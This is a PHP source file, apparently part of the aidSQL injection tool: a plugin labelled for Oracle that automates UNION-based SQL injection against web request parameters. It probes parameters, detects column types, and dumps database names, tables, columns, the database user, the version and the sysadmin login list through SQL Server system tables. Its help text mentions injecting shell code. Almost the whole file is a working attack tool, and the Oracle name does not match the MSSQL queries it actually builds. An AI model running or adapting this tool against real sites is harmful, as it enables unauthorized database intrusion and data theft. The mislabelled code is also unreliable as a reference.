<?php

	namespace aidSQL\plugin\sqli {

		class Oracle extends InjectionPlugin {

			const		PLUGIN_NAME						= "UNION plugin for Oracle DB Server";
			const		PLUGIN_AUTHOR					= "Federico Stange";

			private	$_affectedDatabases			=	array("Oracle");
			private	$_fields							=	array();
			private	$_vulnerableIndex				=	0;

			private	$_concatOpen					=	"<_>";
			private	$_concatClose					=	"</_>";
			private	$_useConcat						=	TRUE;

			public function injectionUnionWithConcat(){

				$queryBuilder	=	new \aidSQL\db\MsSQLQueryBuilder();

				$this->setQueryBuilder($queryBuilder);

				$parser	=	new \aidSQL\parser\Dumb();

				$this->setParser($parser);

				$offset	=	(isset($this->_config["start-offset"])) ? (int)$this->_config["start-offset"] : 1;

				if(!$offset){

					throw(new \Exception("Start offset should be an integer greater than 0!"));

				}

				$sqliConfig	=	$this->_config["all"]["sqli"];

				$sqliParams	=	array(
					"space-char"		=>	" ",
					"field-payloads"	=>	explode('_',$this->_config["field-payloads"]),
					"ending-payloads"	=>	array(
						"comment"=>explode('_',$this->_config["comment-payloads"]),
						"order"=>array(
							array()
						),
						"limit"=>array(
							array()
						)
					)
				);


				if(array_key_exists("start-offset",$this->_config)){

					$offset	=	((int)$this->_config["start-offset"])	?	$this->_config["start-offset"]	:	1;

				}

				$this->log("STEP 1: Checking if site is vulnerable",0,"light_cyan");

				if($this->_isVulnerable($sqliParams,"unionQuery",'',$offset,"NULL")){

					$this->log("STEP 2: Get field types...",0,"light_cyan");

					$this->getFieldTypes();


				}

				if(sizeof($this->_injection)){

					return TRUE;

				}

				return FALSE;

			}

			private function getHttpCode(){

				$transferInfo	=	$this->_httpAdapter->getTransferInfo();
				return $transferInfo["http_code"];

			}

			private function toChar($string){

				$string		=	str_split($this->_concatOpen);

				foreach($string as &$value){

					$value	=	"CHAR(".ord($value).')';

				}

				return implode('+',$string);

			}

			public function useConcat($use=TRUE){

				$this->_useConcat	=	(boolean)$use;

			}

			private function concat($string){

				if(!$this->_useConcat){
					return $string;
				}

				$concat			=	"";
				$concatOpen		=	str_split($this->_concatOpen);
				$concatClose	=	str_split($this->_concatClose);
	
				foreach($concatOpen as &$value){

					$value	=	"CHAR(".ord($value).')';

				}

				foreach($concatClose as &$value){

					$value	=	"CHAR(".ord($value).')';

				}

				$concat	=	implode('+',$concatOpen).'+'.$string.'+'.implode('+',$concatClose);

				return $concat;	

			}

			public function getFieldTypes(){

				$this->log("Changing parser to DOM parser",0,"yellow");

				$parser	=	new \aidSQL\parser\Generic();
				$parser->setOpenTag($this->_concatOpen);
				$parser->setCloseTag($this->_concatClose);
				$parser->setLog($this->_logger);

				$this->setParser($parser);


				if(isset($this->_config["field-types"])){

					$this->log("Well, you've specified field-types, so I'm guessing you're very smart (or very stupid) ...",0,"white");
					$this->log("So, I'll trust you, we will use ".$this->_config["field-types"],0,"white");

					$types		=	explode(',',$this->_config["field-types"]);

					$fieldTypes	=	Array();

					$flag			=	FALSE;

					foreach($types as $type){

						$tmp	=	explode('|',$type);

						if($tmp[0]=="string"){

							$flag	=	TRUE;

						}

						$fieldTypes[]	=	Array(
															"type"=>$tmp[0],
															"displayed"=>$tmp[1]
						);	

					}

					if(!$flag){

						throw(new \Exception("THIS PLUGIN REQUIRES AT LEAST ONE FIELD OF TYPE \"string\", SORRY :/"));

					}

					$this->_injection["fieldTypes"]	=	$fieldTypes;

					return TRUE;
					
				}

				$this->log("Checking for fields of string type (char nvarchar varchar)",0,"light_cyan");

				$fieldTypes	=	array_pad(Array(),$this->_injection["offset"]+1,"");

				$sqlServerDataTypes	=	Array(
															"string"=>"DB_NAME()",
															"int"=>1,
															"date"=>"GETDATE()"
				);

				for($i=0;$i<=$this->_injection["offset"];$i++){

					foreach($sqlServerDataTypes as $type=>$testValue){

						if($type=="string"){

							$testValue	=	$this->concat($testValue);

						}

						$result	=	$this->unionQuery($testValue,$i);

						if($this->getHttpCode()==500){

							$this->log("Field ".($i+1)." is not of type $type",1,"yellow");
							continue;

						}


						$this->log("Field ".($i+1)." is of type $type!",0,"light_green");

						$fieldTypes[$i]	=	Array(
															"type"=>$type,
															"displayed"=> (is_array($result)) ? 1 : 0
						);

						break;

					}

				}

				if(!sizeof($fieldTypes)){

					throw(new \Exception("COULDNT MSSQL QUERY FIELD TYPES, SORRY"));

				}

				$types	=	Array();
				$flag		=	FALSE;

				foreach($fieldTypes as $field){

					if($field["type"]=="string"&&$field["displayed"]){

						$flag	=	TRUE;

					}

					$types[]	=	$field["type"].'|'.$field["displayed"];

				}


				if(!$flag){

					throw(new \Exception("COULD NOT FIND AT LEAST ONE FIELD OF TYPE \"string\" THAT IS BEING DISPLAYED, INJECTION WON'T WORK!"));

				}

				$this->log("FOR THE NEXT TIME, YOU CAN SAVE A LOT OF TIME BY USING --sqli-mssql-field-types=".implode(',',$types),0,"green");
				$this->_injection["fieldTypes"]	=	$fieldTypes;

			}

			private function checkUnionInjectionParameters(Array &$sqliParams){

				if(!isset($sqliParams["field-payloads"])||!is_array($sqliParams["field-payloads"])){

					throw(new \Exception("Invalid field payloads!"));

				}

				if(!isset($sqliParams["ending-payloads"])||!is_array($sqliParams["ending-payloads"])){

					throw(new \Exception("Invalid ending payloads!"));

					if(!isset($sqliParams["comment"])||!is_array($sqliParams["comment"])){

						throw(new \Exception("Comment payloads key inside the ending-payloads array should be an array!"));

					}elseif(!isset($sqliParams["order"])){

						$sqliParams["order"]	=	array();

					}elseif(!isset($sqliParams["limit"])){

						$sqliParams["limit"]	=	array();

					}

				}

			}

			private function makeImpossibleValue($value){

				return -1;

			}

			private function _isVulnerable(Array $sqliParams,$callback=NULL,$wrapping=NULL,$offset=1,$value=NULL){

				$this->checkUnionInjectionParameters($sqliParams);

				$originalUrl		=	clone($this->_httpAdapter->getUrl());

				$requestVariables	=	$this->_httpAdapter->getUrl()->getQueryAsArray();

				foreach($requestVariables as $requestVariable=>$requestVariableValue){

					if($this->isIgnoredRequestVariable($requestVariable,$requestVariableValue)){

						continue;

					}

					$iterationContainer	=	array();

					if($offset>1){

						for($i=0;$i<$offset;$i++){

							$iterationContainer[]	=		(!empty($value))	?	$value	:	$i;

						}

					}


					for($maxFields=$offset;$maxFields<=$this->_injectionAttempts;$maxFields++){

						$this->breakOnDemandMessage();	

						if($this->readKeyboard()=='b'){

							$this->log("Detected user input, ABORT!",2,"light_purple");						
							return FALSE;

						}

						$iterationContainer[]	=	(!empty($value))	?	$value	:	$maxFields;

						foreach($sqliParams["field-payloads"] as $payLoad){

							if($this->readKeyboard()=='b'){

								$this->log("Detected user input, ABORT!",2,"light_purple");						
								return FALSE;

							}

							foreach($sqliParams["ending-payloads"]["comment"] as $comment) {

								if($this->readKeyboard()=='b'){

									$this->log("Detected user input, ABORT!",2,"light_purple");						
									return FALSE;

								}

								foreach($sqliParams["ending-payloads"]["order"] as $order){

									if($this->readKeyboard()=='b'){

										$this->log("Detected user input, ABORT!",2,"light_purple");						
										return FALSE;

									}


									foreach($sqliParams["ending-payloads"]["limit"] as $limit){

										if($this->readKeyboard()=='b'){

											$this->log("Detected user input, ABORT!",2,"light_purple");						
											return FALSE;

										}

										if(!empty($wrapping)){

											$values	=	$this->wrapArray($iterationContainer,$wrapping);

										}else{

											$values	=	$iterationContainer;

										}

										$this->_queryBuilder->setCommentOpen($comment);
										$this->_queryBuilder->union($values,"ALL");
										$this->_queryBuilder->from("dual");

										if(sizeof($order)){

											$this->_queryBuilder->orderBy($order["by"],$order["sort"]);

										}

										if(sizeof($limit)){

											$this->_queryBuilder->top($limit);

										}

										$space			=	$this->_queryBuilder->getSpaceCharacter();

										$madeUpValue	=	$this->makeImpossibleValue($requestVariableValue);

										$sql				=	$madeUpValue.$payLoad.
																$space.$this->_queryBuilder->getSQL().$comment;

										$this->_queryBuilder->setSQL($sql);

										$result	=	$this->query($requestVariable,$callback);

										if($this->getHttpCode()!==200){

											continue;

										}


										$injectionParameters	=	array(
																					"field-payload"=>$payLoad,
																					"order"=>$order,
																					"limit"=>$limit,
																					"comment"=>$comment,
																					"requestVariable"=>$requestVariable,
																					"requestValue"=>$requestVariableValue,
																					"fieldValues"=>$iterationContainer,
																					"offset"=>$maxFields
										);

										$this->log("Injection offset is ".($maxFields+1)." ***",0,"light_purple");

										$this->setInjectionParameters($injectionParameters);

										return TRUE;


									}	//limit

								}	//order

							}	//comment

							$url	=	$this->_httpAdapter->getUrl();
							$url->addRequestVariable($requestVariable,$value); 
							$this->_httpAdapter->setUrl($url);

						}	//field-payload

					}	//maxfields

					$url->addRequestVariable($requestVariable,$requestVariableValue); 
					$this->_httpAdapter->setUrl($url);

				}	//requestVariables

				return FALSE;

			}

			public function getAffectedDatabases(){
			}

			/**
			*This method creates the injection string it uses $this->_injection parameters in order
			*to make the injection string. 
			*/

			private function buildUnionInjection($value,$position=0,$from=NULL,Array $where=array(),Array $group=array()){

				$params	=	$this->_injection;

				foreach($params["fieldValues"] as $key=>&$val){

					if($key==$position){

						$val	=	$value;

					}

				}

				if(is_array($params["limit"])&&sizeof($params["limit"])){

					$this->_queryBuilder->union($params["fieldValues"],"ALL",$params["limit"]);

				}else{

					$this->_queryBuilder->union($params["fieldValues"],"ALL");

				}

				if(!is_null($from)){

					$this->_queryBuilder->from($from);

				}

				if(sizeof($where)){

					$this->_queryBuilder->where($where);

				}

				if(sizeof($group)){

					$this->_queryBuilder->group($group);

				}

				if(isset($params["order"]["by"])){

					$this->_queryBuilder->orderBy($params["order"]["by"],$params["order"]["sort"]);

				}

			}

			/**
			*This method creates the injection string through the buildUnionInjection method and executes the query
			*/

			public function unionQuery($value,$position=0,$from=NULL,Array $where=array(),Array $group=array()){

				$params	=	$this->_injection;

				if(isset($params["fieldTypes"])){

					switch(gettype($value)){

						case "string":

							$type		=	"string";
							$value	=	$this->concat($value);

						break;

						case "int":
							$type	=	"int";
						break;

						default:
							$type="string";
						break;

					}

					foreach($params["fieldTypes"] as $index=>$field){

						if($field["type"]==$type && (boolean)$field["displayed"]){

							$position	=	$index;
							break;

						}

					}
					
				}

				$this->buildUnionInjection($value,$position,$from,$where,$group);

				$sql		=	$this->_queryBuilder->getSQL();

				$sql		=	$params["requestValue"].
								$params["field-payload"].
								$this->_queryBuilder->getSpaceCharacter().
								$sql.
								$params["comment"];


				$this->_queryBuilder->setSQL($sql);

				return parent::query($params["requestVariable"],__FUNCTION__);

			}

			//Obtain registers by doing COUNT() before, and then iterating through the limit

			public function unionQueryIterateLimit($value,$from=NULL,Array $where=array(),Array $group=array()){

				$count	=	$this->count($value,$from,$where,$group);

				if(!$count){

					$this->log("COULDN'T OBTAIN REGISTRY COUNT :/",0,"cyan");

					return FALSE;

				}

				$count	=	$count[0];

				if(!$count){

					$this->log("REGISTRY COUNT = ZERO! :|",0,"cyan");

					return FALSE;

				}

				$this->log("GOT REGISTRY COUNT = $count",0,"light_cyan");

				$result	=	$this->unionQuery($value,0,$from,$where,$group);

				$this->log("RESULTS RETURNED BY PARSER:".sizeof($result),0,"light_cyan");

				if(sizeof($result)==$count){

					$this->log("PARSER AMOUNT IS THE SAME AS REGISTRY COUNT :)",0,"light_purple");

					return $result;

				}

				if(isset($this->_injection["limit"])){

					$restoreLimit	=	$this->_injection["limit"];

				}

				$results			=	array();

				for($i=0;$i<=$count;$i++){

					$this->_injection["limit"]	=	array($i,1);
					$result			=	$this->unionQuery($value,0,$from,$where,$group);	
					$results[$i]	=	$result[0];

				}

				if(isset($this->_injection["limit"])&&isset($restoreLimit)){
					$this->_injection["limit"]	=	$restoreLimit;
				}

				return $results;

			}

			public function count($value,$from=NULL,Array $where=array(),Array $group=array(),$count=NULL){

				return $this->unionQuery("CONVERT(VARCHAR(20),COUNT($value))",0,$from,$where,$group);
					
			}


			public function getSchemas(){

				$databases		=	$this->unionQueryIterateLimit("name","master..sysdatabases");

				$this->log("FOUND ".sizeof($databases)." DATABASES: ".implode(',',$databases));

				$currentDatabase		=	$this->unionQuery("DB_NAME()");
				$currentDatabase		=	$currentDatabase[0];

				$this->log("CURRENT DATABASE IS:".$currentDatabase,0,"green");

				$version					=	$this->getVersion();
				$version					=	$version[0];

				$this->log("DATABASE VERSION IS :".$version,0,"green");

				$user						=	$this->getUser();
				$user						=	$user[0];

				$this->log("DATABASE USER IS :".$user,0,"green");

				$this->setDbBuilder("MsSQL");

				//In case that the --interactive option has been specified
				$this->selectDatabases($databases);

				if(isset($this->_config["skip-schemas"])){
				
					$ommitSchemas			=	explode(',',$this->_config["skip-schemas"]);

				}

				foreach($databases as $database){


					if(isset($ommitSchemas)){

						if(in_array($database,$ommitSchemas)){

							$this->log("Skipping fetching \"$database\" schema",0,"light_purple");
							continue;

						}

					}

					$this->log("REVERSE ENGINEERING STRUCTURE FOR DATABASE: $database",0,"light_cyan");

					$dbSchema	=	$this->getSingleSchema($database,$version,$user);

					if(!$dbSchema){

						$this->log("WARNING: Couldnt fetch database schema!",2,"yellow");
						continue;

					}

					$this->addSchema($dbSchema);

				}


			}

			public function canReadDatabase($database,$user){


				$where	=	Array(
										"dbname='$database'"
				);

				return $this->unionQuery("name",0,"master..syslogins",$where);

			}

			public function getTables($database){

				$this->log("FETCH TABLES FOR DATABASE:$database",0,"green");

				$where	=	array("xtype='U'");

				$tables	=	$this->unionQueryIterateLimit("name","$database..sysobjects",$where);

				return $tables;

			}


			public function getSingleSchema($database,$version,$user){

				$tables	=	$this->getTables($database);

				if($this->getHttpCode()==500){

					$this->log("CAN'T READ TABLES FROM $database, PROBABLY BECAUSE DB USER HAS NOT ENOUGH PRIVILEGES :(",1,"red");
					return FALSE;

				}

				$dbSchema	=	new \aidSQL\core\DatabaseSchema();

				$dbSchema->setDbName($database);
				$dbSchema->setDbUser($user);
				$dbSchema->setDbVersion($version);

				$retTables	=	array();

				foreach($tables as $table){

					$columns						=	$this->getColumns($table,$database);

					$tmpTable					=	Array();

					$tmpTable["type"]			=	"BASE TABLE";
					$tmpTable["engine"]		=	"MyISAM";
					$tmpTable["increment"]	=	0;
					$tmpTable["collation"]	=	"UTF-8";

					$dbSchema->addTable($table,$tmpTable,$columns);

					$retTables[]	=	$table;

				}

				return $dbSchema;

			}
			

			public function getColumns($table=NULL,$database=NULL){

				$injection	=	"$database..syscolumns.name";
				$injection	=	"$database..syscolumns.name+CHAR(37)+TYPE_NAME($database..syscolumns.xtype)";
				$from			=	"$database..syscolumns,$database..sysobjects";

				$where		=	Array(
												"$database..syscolumns.id=$database..sysobjects.id",
												"AND",
												"$database..sysobjects.name='$table'"
				);

				$columns	=	$this->unionQueryIterateLimit($injection,$from,$where);

				if(is_array($columns)){

					$retCols	=	Array();

					foreach($columns as $column){

						$column	=	explode('%',$column);

						$tmpCol	=	Array(
										"name"=>$column[0],
										"type"=>$column[1],
										"key"=>0,
										"extra"=>0
						);

						$retCols[]	=	$tmpCol;

					}

					return $retCols;

				}


				return $columns;

			}

			public function getUser(){

				$user	=	$this->unionQuery("system_user");
				return $user;

			}

			public function getVersion(){

				$version	=	$this->unionQuery("@@version");
				return $version;

			}

			public function getDatadir(){

			}

			public function isRoot($user=NULL){

				$isRoot	=	$this->getUser();	
				$isRoot	=	$isRoot[0];

				if($isRoot == "sa"){

					$this->log("USER IS ROOT!",0,"light_green");
					return TRUE;

				}

				$admins	=	$this->getAdmins();

				if(!in_array($isRoot,$admins)){

					$this->log("USER $isRoot is NOT a sysadmin :(",0,"red");
					$this->log("ADMIN USERS ARE:".implode(',',$admins),0,"green");

					return FALSE;

				}


				return TRUE;

			}


			private function getAdmins(){

				$value	=	$this->unionQueryIterateLimit("name","master..syslogins",Array("sysadmin=1"));

				return $value;

			}


			public function getShell(\aidSQL\core\PluginLoader &$pLoader,\aidSQL\http\crawler &$crawler){

				return FALSE;

			}


			public static function getHelp(\aidSQL\core\Logger $logger){

				$logger->log("--sqli-oracle-injection-attempts\tAt how many attempts shall we stop trying");
				$logger->log("--sqli-oracle-start-offset\t\t<integer>Start the UNION injection at this offset (if you know what youre doing)");
				$logger->log("--sqli-oracle-var-count\t\t<integer> Try this amount of variables per link");
				$logger->log("--sqli-numeric-only\t\t\tOnly try to perform injection on integer fields");
				$logger->log("--sqli-oracle-strings-only\t\tOnly try to perform injection on string fields");
				$logger->log("--sqli-oracle-field-payloads\t\tSet field payloads delimited by _\ti.e: _'_')_%)");
				$logger->log("--sqli-oracle-ending-payloads\t\tSet ending payloads delimited by _\ti.e: LIMIT 1,1_ORDER BY 1");
				$logger->log("--sqli-oracle-comment-payloads\t\tSet comment payloads delimited by _\ti.e: #_/*_--");
				$logger->log("--sqli-oracle-shell-code\tPut your favorite shell code here i.e ".'<?php var_dump($_SERVER);?>');

			}

		}

	}

?>
